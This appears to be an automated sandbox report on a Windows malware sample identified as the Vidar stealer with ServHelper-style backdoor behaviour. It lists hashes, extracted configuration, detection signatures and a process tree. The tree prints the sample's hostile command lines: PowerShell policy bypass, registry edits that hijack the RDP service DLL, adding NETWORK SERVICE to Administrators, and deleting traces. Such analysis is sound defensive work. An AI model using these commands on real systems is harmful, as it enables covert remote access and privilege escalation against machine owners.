Analysis
max time kernel: 123s
max time network: 157s
platform: windows10_x64
resource: win10-en-20210920
submitted: 16/10/2021, 00:21
Static task: static1
General
Target: fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
Size: 727KB
MD5: f910255f4ace1b36d8ae4e4529da6754
SHA1: 650f4289e43c451095a9946c9391594e263c0fd5
SHA256: fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886
SHA512: 241a45ac29b430aa67c85591258022c5b00b6bb55247f51f7ffcb73be1276cf4bc8f4649ba668b6885cbbbfee8609fda788b63b1169c86200d633ff70451b6e5
Malware Config
Extracted
vidar
41.4
1008
https://mas.to/@sslam
profile_id: 1008
Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Vidar Stealer 2 IoCs
resource | yara_rule
behavioral1/memory/2352-116-0x00000000033D0000-0x00000000034A6000-memory.dmp | family_vidar
behavioral1/memory/2352-117-0x0000000000400000-0x0000000001729000-memory.dmp | family_vidar

Downloads MZ/PE file

Executes dropped EXE 2 IoCs
pid | Process
3896 | O6DV018CD4UB8WOM.exe
964 | InstallUtil.exe

Modifies RDP port number used by Windows 1 TTPs

Sets DLL path for service in the registry 2 TTPs

Loads dropped DLL 2 IoCs
pid | Process
2352 | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
2352 | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe

Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral1/memory/3896-130-0x00000000064A0000-0x00000000064C1000-memory.dmp | agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops file in System32 directory 1 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\rdpclip.exe | powershell.exe

Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 3896 set thread context of 964 | 3896 | O6DV018CD4UB8WOM.exe | 74

Drops file in Windows directory 8 IoCs
description | ioc | Process
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 1 IoCs
pid | pid_target | Process | procid_target
1940 | 2352 | WerFault.exe | 69

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe

Modifies registry key 1 TTPs 1 IoCs
pid | Process
960 | reg.exe

NTFS ADS 4 IoCs
description | ioc | Process
File created | C:\ProgramData\O6DV018CD4UB8WOM.exe:Zone.Identifier, C:\ProgramData\O6DV018CD4UB8WOM.exe, C:\ProgramData\8ML8SCVTWHBNE37V.exe:Zone.Identifier | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
File created | C:\ProgramData\O6DV018CD4UB8WOM.exe:Zone.Identifier | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
File opened for modification | C:\ProgramData\O6DV018CD4UB8WOM.exe:Zone.Identifier | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
File created | C:\ProgramData\O6DV018CD4UB8WOM.exe, C:\ProgramData\8ML8SCVTWHBNE37V.exe | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs
pid | Process
2352 | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe (8 entries)
1940 | WerFault.exe (13 entries)
3896 | O6DV018CD4UB8WOM.exe (2 entries)
2796 | powershell.exe (3 entries)
3016 | powershell.exe (3 entries)
3256 | powershell.exe (3 entries)
692 | powershell.exe (3 entries)
2796 | powershell.exe (3 entries)

Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
620 | Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs
description | pid | Process
Token: SeRestorePrivilege | 1940 | WerFault.exe
Token: SeBackupPrivilege | 1940 | WerFault.exe
Token: SeDebugPrivilege | 1940 | WerFault.exe
Token: SeDebugPrivilege | 3896 | O6DV018CD4UB8WOM.exe
Token: SeDebugPrivilege | 2796 | powershell.exe
Token: SeDebugPrivilege | 3016 | powershell.exe
Token: SeDebugPrivilege | 3256 | powershell.exe
Token: SeDebugPrivilege | 692 | powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2352 wrote to memory of 3896 | 2352 | fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe | 71 (3 entries)
PID 3896 wrote to memory of 964 | 3896 | O6DV018CD4UB8WOM.exe | 74 (9 entries)
PID 964 wrote to memory of 2796 | 964 | InstallUtil.exe | 76 (3 entries)
PID 2796 wrote to memory of 1568 | 2796 | powershell.exe | 78 (3 entries)
PID 1568 wrote to memory of 2276 | 1568 | csc.exe | 79 (3 entries)
PID 2796 wrote to memory of 3016 | 2796 | powershell.exe | 80 (3 entries)
PID 2796 wrote to memory of 3256 | 2796 | powershell.exe | 82 (3 entries)
PID 2796 wrote to memory of 692 | 2796 | powershell.exe | 86 (3 entries)
PID 2796 wrote to memory of 1168 | 2796 | powershell.exe | 88 (3 entries)
PID 2796 wrote to memory of 960 | 2796 | powershell.exe | 89 (3 entries)
PID 2796 wrote to memory of 1172 | 2796 | powershell.exe | 90 (3 entries)
PID 2796 wrote to memory of 1748 | 2796 | powershell.exe | 91 (3 entries)
PID 1748 wrote to memory of 3532 | 1748 | net.exe | 92 (3 entries)
PID 2796 wrote to memory of 3796 | 2796 | powershell.exe | 93 (3 entries)
PID 3796 wrote to memory of 1836 | 3796 | cmd.exe | 94 (3 entries)
PID 1836 wrote to memory of 2296 | 1836 | cmd.exe | 95 (3 entries)
PID 2296 wrote to memory of 416 | 2296 | net.exe | 96 (3 entries)
PID 2796 wrote to memory of 2480 | 2796 | powershell.exe | 97 (3 entries)
PID 2480 wrote to memory of 2036 | 2480 | cmd.exe | 98 (3 entries)
PID 2036 wrote to memory of 3088 | 2036 | cmd.exe | 99 (1 entry)
Processes (indented by depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe"
  - Loads dropped DLL
  - Checks processor information in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 2352

  C:\ProgramData\O6DV018CD4UB8WOM.exe
    Command line: "C:\ProgramData\O6DV018CD4UB8WOM.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3896

    C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 964

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        - Drops file in System32 directory
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2796

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hlhsew5i\hlhsew5i.cmdline"
          - Suspicious use of WriteProcessMemory
          PID: 1568

          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE7C.tmp" "c:\Users\Admin\AppData\Local\Temp\hlhsew5i\CSCDE9952661A4146A1965C9E710AF8E9.TMP"
            PID: 2276

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3016

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3256

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 692

        C:\Windows\SysWOW64\reg.exe
          Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          PID: 1168

        C:\Windows\SysWOW64\reg.exe
          Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          - Modifies registry key
          PID: 960

        C:\Windows\SysWOW64\reg.exe
          Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
          PID: 1172

        C:\Windows\SysWOW64\net.exe
          Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          - Suspicious use of WriteProcessMemory
          PID: 1748

          C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
            PID: 3532

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
          PID: 3796

          C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c net start rdpdr
            - Suspicious use of WriteProcessMemory
            PID: 1836

            C:\Windows\SysWOW64\net.exe
              Command line: net start rdpdr
              - Suspicious use of WriteProcessMemory
              PID: 2296

              C:\Windows\SysWOW64\net1.exe
                Command line: C:\Windows\system32\net1 start rdpdr
                PID: 416

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
          PID: 2480

          C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c net start TermService
            - Suspicious use of WriteProcessMemory
            PID: 2036

            C:\Windows\SysWOW64\net.exe
              Command line: net start TermService
              PID: 3088

              C:\Windows\SysWOW64\net1.exe
                Command line: C:\Windows\system32\net1 start TermService
                PID: 392

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
          PID: 1516

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
          PID: 2092

  C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 2280
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1940